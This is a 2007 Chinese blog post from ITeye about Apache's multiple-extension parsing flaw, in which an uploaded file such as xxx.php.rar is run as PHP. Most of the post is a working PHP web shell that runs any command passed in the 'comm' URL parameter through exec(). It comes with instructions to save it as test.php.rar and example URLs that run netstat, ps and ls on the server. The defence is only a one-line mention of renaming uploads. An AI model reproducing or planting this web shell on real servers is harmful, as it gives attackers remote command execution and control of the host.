关于php apache后缀漏洞附测试代码 - 清风'blog - ITeye博客

`

netxdiy

浏览: 682188 次
性别:
来自: 上海

最近访客更多访客>>

u012363178

smzyyyjyrctl

88250

abiandbel

博主相关

博客

微博

相册

收藏

留言

关于我

文章分类

社区版块

存档分类

最新评论

TheUniqueGirl： Tomcat系统架构与设计模式：http://www.doci ...
Tomcat
aykjy： ...
UML常见工具之NetBeans(downmoon)
不老肖邦：谢谢提供的简单示例
JAVA toString（）

关于php apache后缀漏洞附测试代码

阅读更多

关于php apache后缀漏洞附测试代码

很致命的漏洞，如果你的程序有这方面的问题。

主要危害是带上传功能的应用。
如果你是把上传的文件统一改名了还好。

如果没有改名。那么就危险拉。
如果他上传jpg,gif,zip还好说拉。如果他上一个 xxx.php.rar 的文件那么就轻松拿到你的web sheel 拉。

QUOTE:

<?
if($_GET[comm]!='')
{
exec($_GET[comm],$re);
foreach($re as $v)
echo $v.'<br>';
}
else
exit('Please input command...');
?>

以上代码另存为test.php.rar

测试代码：
http://localhost:/test.php.rar?comm=netstat -n

http://localhost:/test.php.rar?comm=ps -A

http://localhost:/test.php.rar?comm=ls

分享到：

Linux与Windows通过NFS文件同步 | oracle的基本命令

2007-06-18 17:26
浏览 342
评论(0)
查看更多

评论

发表评论

您还没有登录,请您登录后再发表评论

相关推荐

apache漏洞汇总apache漏洞汇总: Apache-flink 未授权访问任意jar包上传反弹shell CVE-2019-0193 Apache-Solr via ...CVE-2019-17564 Apache-Dubbo反序列化漏洞 CVE-2020-13925 Apache Kylin 远程命令执行漏洞 CVE-2020-13957 Apache Solr 未授权上传

apache 2.2.14漏洞代码和exp: apache 2.2.14漏洞代码和exp

Apache Log4j2 远程代码执行漏洞检测工具: Apache Log4j2 远程代码执行漏洞检测工具，包含windows版和linux版。图形化 Apache Log4j2检测工具

Apache后缀名解析漏洞分析和防御方法: 主要介绍了Apache后缀名解析漏洞分析和防御方法,后缀解析漏洞通常通过伪造PHP后辍,来上传文件到服务器中,很致命的一漏洞,需要的朋友可以参考下

Apache Log4j 2代码漏洞处置指南及检测工具.zip: Apache Log4j 2存在远程代码执行漏洞处置指南及期检测工具

基于Java实现的一款Apache Dubbo漏洞检测工具源代码，包含了信息收集、参数爆破等功能，实现一键漏洞利用检测: 一款Apache Dubbo漏洞检测工具。包含了信息收集、参数爆破等功能，利用获取到的信息一键完成对Dubbo的Provider和Consumer的漏洞利用检测漏洞扫描本项目只检测每种检测方式下，影响版本最新的漏洞。 Dubbo provider...

apache Tomcat 漏洞: apache Tomcat 漏洞

解决Apache Log4j 远程代码执行漏洞log4j2部分jar: 解决Apache Log4j 远程代码执行漏洞log4j2部分jar，包含log4j-1.2-api-2.15.0.jar，log4j-api-2.15.0.jar，log4j-core-2.15.0.jar，log4j-to-slf4j-2.15.0.jar

Apache Tomcat 最新源代码: Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache Tomcat 最新源代码Apache ...

Apache http 客户端组件代码: Apache http 客户端组件代码Apache http 客户端组件代码Apache http 客户端组件代码Apache http 客户端组件代码Apache http 客户端组件代码Apache http 客户端组件代码Apache http 客户端组件代码Apache http 客户端...

Apache Log4j 远程代码执行漏洞(CVE-2021-44832): Java 6 将 log4j 升级到 2.3.2 版本，Java 7 将 log4j 升级到 2.12.4 版本，Java 8 或更高版本将 log4j 升级到 2.17.1 版本

关于apache mod_hearders漏洞: 关于部分Apache 的mod_hearders漏洞修复由于环境不同打补丁存在问题的解决办法

CVE-2021-25646-Apache Druid漏洞POC.py: CVE-2021-25646-Apache Druid漏洞POC.py

Apache相关漏洞极其预防1: Apache相关漏洞极其预防1

Apache Server源代码分析(PDF): Apache Server源代码分析(PDF)

Apache Druid远程代码执行漏洞响应通告: Apache Druid远程代码执行漏洞响应通告

Apache Solr 代码执行漏洞应急响应通告: Apache Solr 代码执行漏洞应急响应通告

大数据+Apache Doris资料包+示例代码: 大数据+Apache Doris资料包+示例代码大数据+Apache Doris资料包+示例代码大数据+Apache Doris资料包+示例代码大数据+Apache Doris资料包+示例代码大数据+Apache Doris资料包+示例代码大数据+Apache Doris资料包+示例...

Global site tag (gtag.js) - Google Analytics